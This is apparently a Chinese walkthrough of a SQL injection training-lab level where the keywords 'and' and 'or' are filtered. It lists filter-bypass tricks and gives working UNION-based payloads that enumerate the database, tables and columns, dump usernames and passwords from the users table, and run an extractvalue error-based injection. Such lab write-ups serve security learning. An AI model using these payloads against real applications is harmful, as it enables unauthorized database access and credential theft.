0x01 判断注入类型
本关将and和or替换为空
绕过方法:
- 双写--or=oorr、and=anandd
- 大小写--or=Or=OR=oR
- 利用运算法--or=||、and=&&
- url编码--#=%23、hex编码--~=0x7e
- 注释--/or/
判断字段数为3
?id=1' oorrder by 3--+
0x02 判断数据库名
?id=-1' union select 1,user(),database()--+
0x03 判断表名
?id=-1' union select 1,2,(select group_concat(table_name)from infoorrmation_schema.tables where table_schema='security')--+
#information中or双写绕过
0x04 判断列名
?id=-1' union select 1,2,(select group_concat(column_name)from infoorrmation_schema.columns where table_schema='security' anandd table_name='users')--+
#and双写绕过
0x05得到数据
?id=-1' union select 1,2,(select group_concat(username,passwoorrd)from users)--+
0x06 报错注入
使用extractvalue报错注入
?id=-1'|| extractvalue(1,(concat(0x7e,(select database()),0x7e)))--+